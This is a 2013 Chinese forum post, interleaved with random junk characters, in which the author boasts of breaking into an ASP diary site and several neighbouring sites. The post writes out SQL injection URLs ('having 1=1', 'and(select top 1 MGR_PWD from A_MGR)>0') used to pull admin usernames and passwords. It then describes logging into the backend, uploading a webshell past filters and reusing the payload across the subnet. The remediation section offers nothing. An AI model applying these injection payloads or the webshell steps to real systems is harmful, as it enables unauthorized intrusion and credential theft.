发现一个注入点
: b5 t6 _! c( y" n6 n+ qhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389& w* A! |5 h" {/ U* L0 w
. n* A5 I, N; w: Y* S( }& O7 E$ T习惯性的加’having1=1--; n b" k p" R4 ]0 j
) U6 N: o8 W1 q; Mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 {( Y1 n3 U; P
5 A5 g e5 x! g; s( z/ l9 N
0( y( U8 o) c9 C2 I
9 h" V/ V( ?& F& d3 v( i9 k
爆出Diary_A.dl_Title(这时候很激动啊)
r$ w$ F# _9 ]
: d: S1 B- O3 A$ O& w" V那么继续# e) w; N% ^9 f L7 K
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
' X1 [" M. ~' x" ~* ]9 V! s, r
继续,一直爆下去
. T4 B. G3 s% a9 G, Q
) s/ Z' }2 J! N1 P. n爆到几个字段和表段 但是没找到需要的管理用户的字段
+ p/ v6 l* h1 r
$ w) N2 B" ^% V( K s8 @: [1 b蛋疼了 怎么办 然后去后台登陆页看源码+ Q# Z' z# ~. Z( Q, Z: }
8 ]) f2 L+ k( k5 i0
0 b* \* g( K3 w& s1 v$ r9 o( g
Input name= “ADUID”9 n/ c0 S0 S% T& M9 G. p5 E4 C
Input name= “ADPWD”
6 H. L. O3 H* Z9 {% g7 o; s
[) f% n- E9 J& f& u很幸运 找到了字段那就继续
0 B) L2 [1 }8 Z% m" j% d找到之后开始爆用户# m7 A7 r5 o! t g+ R/ @) q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
5 Y- H0 W& {; z: O! n% e爆密码6 ~* ]5 L8 u0 u) o# }7 m$ m
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
. I1 _2 b. n5 j+ x# _测试了下 这个注入点只能爆到文章哪里的表 6 U" W+ a% @) B2 R) ~$ w
f- }9 X& b7 _
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
0 e7 m0 E4 `+ S7 ?
7 V! Y+ k; \" M4 ^. l! r又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了5 e. n7 f; V* N3 X4 r; B' n
3 \; q. d5 l% b/ p4 K! [' z1 ` E473
: R; Q5 i- D3 {( L: Z2 P/ X/ J0 F3 ^1 [
进后台
1 n$ u f3 C* ?/ i! ~- o* p
) \6 V8 f, x* n
2 [- A3 u" L8 }) Y' o发现几个上传点 有的地方不能上传 而且防止恶意代码) j: l7 E* f5 O q8 d
: u9 N, N) ]9 C
没办法 各种百度各种找大牛 找到一只好像可以突破的马
! N @9 i$ ^6 H, c* O( T
7 D1 ?$ l6 J. M* J7 a' S# u
) o. |* i3 [% [% d$ ~在系统管理那里直接上传 不过没有显示地址
8 _7 `5 e$ \. C8 K, T: d* B: G1 e
9 c) L6 i; |+ [9 O: z% p再上传一次 抓包 搞定OK8 O. W- I D8 H/ }2 h/ U3 G
# M4 p4 d" y8 w% X& }% o! M1 x, ~1 I7 _" ?$ \, x
& I8 n$ u9 @! e7 | `
472
% ]5 W) x; d$ `
4 @1 ~* J) s; i) c: G晚上不行了 去睡觉。。。( ?2 @4 o3 k" _+ l: |$ [' j! k
第二天刚起床 闲的没事做继续日站吧 9 I( P# I3 u" X' [
; }( u# y$ S5 R7 g) U# y
找个站 就把这个站的旁c扫了下4 P1 @, d$ H5 q+ `
4 s& @1 D e7 O" z8 i* y+ Z
发现c段也有一个购物站 ,然后还和这个站的模板差不多
' B( j3 ~8 I: [: V9 P
- b* x2 I7 P4 r: h" L就找到会员登录口测试' B8 g$ P! @5 i3 j
) [: W8 T8 }8 ~- k8 \& y
'and (select top 1 MGR_UID from A_MGR)>0—( ? u2 i5 P0 e5 d' c* z/ I4 Z
果断爆到了 这时候我很激动 通杀
E b; X. e7 l, G( E; _- Y) D4 G
再次翻c段. U& f7 K5 E, w& o4 P$ w
- g. n5 @' e: z1 F' e3 u5 Q翻出几个站 都成功拿下
2 V' q' p0 i, t: ~' q
; ]. J( G" F4 q. [3 u8 E& w$ Y \/ r
3 Q% b7 b; q* ^, ~
; q' U! b3 l' C修复方案:
2 x/ e, n9 I1 S* ~/ Z他们比我专业
5 z* V. m+ |( i1 d& ]3 X# u _7 F# Y8 V* ~. l2 p
% g1 O- D9 L2 Z
; |* ~& z6 d8 m. H9 d M |
发表于 2013-4-4 17:40:38
收藏
支持
反对